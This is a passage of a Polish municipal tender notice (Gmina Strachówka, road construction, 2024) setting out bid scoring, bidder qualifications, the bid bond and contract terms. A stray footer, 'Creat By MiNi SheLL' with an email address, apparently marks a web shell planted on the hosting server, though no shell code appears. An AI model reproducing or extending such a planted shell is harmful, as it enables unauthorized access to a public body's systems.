matematycznych obliczeń przy ocenie ofert, stanowi podstawową zasadę oceny ofert, które<br/>oceniane będą w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie każdego kryterium.<br/>3. Za parametry najkorzystniejsze w danym kryterium, oferta otrzyma maksymalną ilość punktów ustaloną w poniższym opisie,<br/>pozostałe będą oceniane odpowiednio - proporcjonalnie do parametru najkorzystniejszego, wybór oferty dokonany zostanie na podstawie opisanych kryteriów i ustaloną punktację: punktacja 0-100 (100%=100pkt).<br/>4. Wybór oferty zostanie dokonany w oparciu o przyjęte w niniejszym postępowaniu kryteria oceny ofert przedstawione poniżej.<br/>Lp Nazwa kryterium Waga kryterium Szczegółowy opis, wzór Uwagi, objaśnienia<br/>1 Cena 60% (Cn/Cof.b x 100) x 60% = ilość punktów Cn - najniższa cena wśród ofert nieodrzuconych, Cof.b - cena oferty badanej<br/>nieodrzuconej, 100- wskaźnik stały, 60% - procentowe znaczenie kryterium ceny<br/>2 Okres gwarancji 40% Wydłużenie gwarancji o 12 miesięcy ponad 36 miesięcy = 20 punktów procentowch maksymalnie 24<br/>miesiące czyli 40 punktów procentowych<br/>5. Dodatkowe postanowienia dot. kryterium Okres gwarancji jakości:<br/>Liczba punktów w kryterium gwarancja jakości zostanie przyznany w oparciu o zadeklarowany przez Wykonawcę okres gwarancji<br/>jakości.<br/>Wykonawca może zadeklarować okres gwarancji jakości w następującym przedziale miesięcy:<br/>Przedział miesięcy możliwy do zadeklarowania 36 najkrótszy możliwy - 60 najdłuższy możliwy okres gwarancji jakości<br/>Okres gwarancji jakości należy zadeklarować w pełnych miesiącach.<br/>Sposób przyznawania punktów:<br/>1) Wykonawca, który zaoferuje najdłuższy okres gwarancji jakości otrzyma maksymalną liczbę punktów w niniejszym kryterium,<br/>2) Wykonawca, który zaoferuje najkrótszy okres gwarancji jakości - otrzyma 0 pkt w niniejszym kryterium,<br/>3) W przypadku, gdy wszyscy Wykonawcy zaproponują jednakowy okres gwarancji jakości, wszyscy otrzymują maksymalną liczbę<br/>punktów w niniejszym kryterium.<br/>4) Pozostali, czyli Wykonawcy, którzy zaoferują wartość pośrednią, pomiędzy okresem najkrótszym a najdłuższym), otrzymują liczbę<br/>punktów obliczoną wg wzoru:<br/>Okres gwarancji jakości 36 miesięcy -0 pkt;<br/>Okres gwarancji jakości 48 miesięcy -20 pkt;<br/>Okres gwarancji jakości 60 miesięcy -40 pkt;<br/>6. Oferta wypełniająca w najwyższym stopniu wymagania określone w każdym kryterium otrzyma maksymalną liczbę punktów.<br/>Pozostałym wykonawcom, wypełniającym wymagania kryterialne przypisana zostanie odpowiednio mniejsza (proporcjonalnie<br/>mniejsza) liczba punktów. Wynik będzie traktowany jako wartość punktowa oferty.<br/>7. Wynik - oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów w oparciu o ustalone kryteria)<br/>zostanie oceniona jako najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów.<br/>Wykonawca, którego oferta zostanie oceniona jako najkorzystniejszą podlegać będzie badaniu czy nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>8. Zamawiający dla potrzeb oceny oferty, której wybór prowadziłby do powstania u zamawiającego obowiązku podatkowego zgodnie<br/>z przepisami o podatku od towarów i usług, doliczy do przedstawionej w niej ceny podatek od towarów i usług, który miałby<br/>obowiązek rozliczyć zgodnie z tymi przepisami.<br/>9. Zamawiający nie przewiduje przeprowadzenia aukcji elektronicznej w celu wyboru najkorzystniejszej spośród ofert uznanych za<br/>ważne.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje warunku w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie precyzuje warunku w tym zakresie<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie precyzuje warunku w tym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że wykonawca spełnia warunek w zakresie wykształcenia, kwalifikacji zawodowych, doświadczenia,<br/>potencjału technicznego wykonawcy lub osób skierowanych przez wykonawcę do realizacji zamówienia, umożliwiające<br/>realizację zamówienia na odpowiednim poziomie jakości jeżeli:<br/>1. Warunek w zakresie doświadczenia:<br/>• Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wykonał (zakończył) co najmniej dwie roboty budowlane polegające na budowie,<br/>rozbudowie lub przebudowie drogi o nawierzchni z betonu asfaltowego o długości co najmniej 1 km każda.<br/>2. Warunek dotyczący osób skierowanych do realizacji zamówienia:<br/>• Wykonawca wykaże, że dysponuje osobami posiadającymi odpowiednie kwalifikacje zawodowe skierowanymi do realizacji<br/>zamówienia tj. kierownikiem budowy posiadającym uprawnienia budowlane do kierowania i nadzorowania robotami<br/>budowlanymi w specjalności drogowej - zgodnie z odpowiednimi przepisami Prawa budowlanego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wykluczy z<br/>postępowania wykonawców, wobec których zachodzą podstawy wykluczenia, o których mowa w art. 108 ust. 1 ustawy PZP oraz art.<br/>7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r., poz. 835<br/>Weryfikacja spełnienia warunku przez Zamawiającego nastąpi wyłącznie na podstawie oświadczenia składanego w oparciu o art.<br/>125 ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę (załącznik nr 2) oraz na podstawie oświadczenia, którego wzór stanowi zał. nr 8 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie<br/>z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących<br/>podmiotowych środków dowodowych:<br/>1. wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo<br/>wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z<br/>podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem<br/>dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały<br/>wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje<br/>bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej<br/>przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty:<br/>Zamawiający wymaga, aby Wykonawca wykazał, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wykonał (zakończył) co najmniej dwie roboty budowlane polegające na<br/>budowie, rozbudowie lub przebudowie drogi o nawierzchni z betonu asfaltowego o długości co najmniej 1 km każda<br/>2. wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>Wykonawca wykaże, że dysponuje osobami posiadającymi odpowiednie kwalifikacje zawodowe skierowanymi do realizacji<br/>zamówienia tj. kierownikiem budowy posiadającym uprawnienia budowlane do kierowania i nadzorowania robotami budowlanymi w specjalności drogowej - zgodnie z odpowiednimi przepisami Prawa budowlanego</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta składana jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym.<br/>2. Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w<br/>postępowaniu w zakresie wskazanym w rozdziale II podrozdziałach 7 i 8 SWZ. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na dzień składania ofert,<br/>tymczasowo zastępujący wymagane podmiotowe środki dowodowe, wskazane w rozdziale II podrozdziale 9 pkt 2 SWZ.<br/>4. Do oferty należy załączyć:<br/>1) Formularz ofertowy wraz z oświadczeniami o spełnianiu warunków udział w postępowaniu oraz braku podstaw do wykluczenia o treści zgodnej z Załącznikiem nr 2 do SWZ.<br/>2) Pełnomocnictwo (jeśli wymagane)<br/>3) Zobowiązanie podmiotu trzeciego (jeśli występuje)<br/>4) Oświadczenie na podstawie art. 117 ust. 4 PZP w przypadku wykonawców wspólnie ubiegających się o udzielenie<br/>5) Tabele elementów scalonych - wypełnione i podpisane przez Wykonawcę <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1) Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem<br/>terminu składania ofert, wnieść wadium w kwocie: 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych).<br/>2) Wadium musi obejmować pełen okres związania ofertą tj. do dnia 27.08.2024 r.<br/>3) Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>4) Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy<br/>Bank Spółdzielczy w Łochowie Oddział w Jadowie 49 9233 0001 2600 7751 2000 0020 z adnotacją: &#34;wadium-ZP.271.3.2024”. Wadium musi wpłynąć na wskazany rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy zamawiającego).<br/>5) Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy:<br/>- nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym w gwarancji lub poręczeniu musi być GMINA STRACHÓWKA UL. C. K. NORWIDA 6, 05-282 STRACHÓWKA, NIP: 125-13-33-679 <br/>- określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>- kwotę gwarancji/poręczenia,<br/>- termin ważności gwarancji/poręczenia,<br/>- zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>6) W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>7) Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>8) Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu<br/>warunków udziału w postępowaniu w zakresie wskazanym w rozdziale II podrozdziałach 7 i 8<br/>SWZ. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo<br/>zastępujący wymagane podmiotowe środki dowodowe, wskazane w rozdziale II podrozdziale 9<br/>pkt 2 SWZ.Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym.Oświadczenie<br/>składają odrębnie:<br/>- wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz<br/>spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu.<br/>• W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy<br/>zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego<br/>będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych<br/>wykonawców należy załączyć do oferty.<br/>Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w szczególności<br/>wskazanie:<br/>- postępowania o zamówienie publiczne, którego dotyczy,<br/>- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z<br/>nazwy z określeniem adresu siedziby,<br/>- ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>• Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden<br/>spełnia warunek dotyczący uprawnień, są zobowiązani dołączyć do oferty oświadczenie, z<br/>którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>• Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W<br/>takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane jedynie w formie pisemnej w postaci aneksu do<br/>umowy podpisanego przez obydwie strony, pod rygorem nieważności.<br/>2. Dopuszcza się możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której<br/>dokonano wyboru Wykonawcy, w przypadku gdy zmiana taka nie jest istotna w rozumieniu art. 454 ust. 2 ustawy oraz w<br/>przypadku zaistnienia okoliczności określonych w art.455 ust 1 i 2 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2021 r.<br/>poz. 1129 z późn. zm.). Zmiany umowy są dopuszczalne w szczególności w przypadku wystąpienia, co najmniej jednej z<br/>okoliczności wymienionych poniżej, w zakresie:<br/>• Zmiany terminu realizacji zadania<br/>• zmiany osób realizujących zamówienie<br/>• rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy,<br/>• koniecznością wykonania robót dodatkowych lub zamiennych,<br/>• w przypadku urzędowej zmiany wysokości stawki podatku VAT,<br/>• zmiany sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy<br/>• zmiany terminu Wykonania lub wynagrodzenia będące następstwem okoliczności leżących po stronie Zamawiającego,<br/>• obniżenie wynagrodzenia Wykonawcy, spowodowane rezygnacją przez Zamawiającego z realizacji części przedmiotu<br/>umowy, jednak nie większej niż 30 % wielkości świadczenia łącznie.<br/>• zmiany stawki podatku od towarów i usług oraz podatku akcyzowego ,<br/>• zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na<br/>podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,<br/>• zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na<br/>ubezpieczenia społeczne lub ubezpieczenie zdrowotne,<br/>• zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4<br/>października 2018 r. o pracowniczych planach kapitałowych (Dz. U. z 2020 r. poz. 1342),<br/>• Zmiana cen materiałów lub kosztów<br/>1. Obowiązek wykazania wpływu zmian, o których mowa w niniejszym paragrafie na zmianę wynagrodzenia, o którym mowa<br/>w §2 ust.1 pkt. 1 i 2 Umowy, należy do Wykonawcy pod rygorem odmowy dokonania zmiany Umowy przez Zamawiającego.<br/>2. Maksymalną wartość zmiany wynagrodzenia, jaką dopuszcza zamawiający w efekcie zastosowania postanowień o<br/>zasadach wprowadzania zmian wysokości wynagrodzenia to 10% wartości zamówienia określonego w § 2 ust. 1.<br/>Szczegółowy wykaz zmiany wykaz zmian postanowień umownych znajduje się w § 13 wzoru umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-29 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi SWZ dokumentami należy złożyć za pośrednictwem elektronicznej platformy zakupowej pod adresem: https://strachowka.ezamawiajacy.pl w zakładce OFERTY</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-29 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-27</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com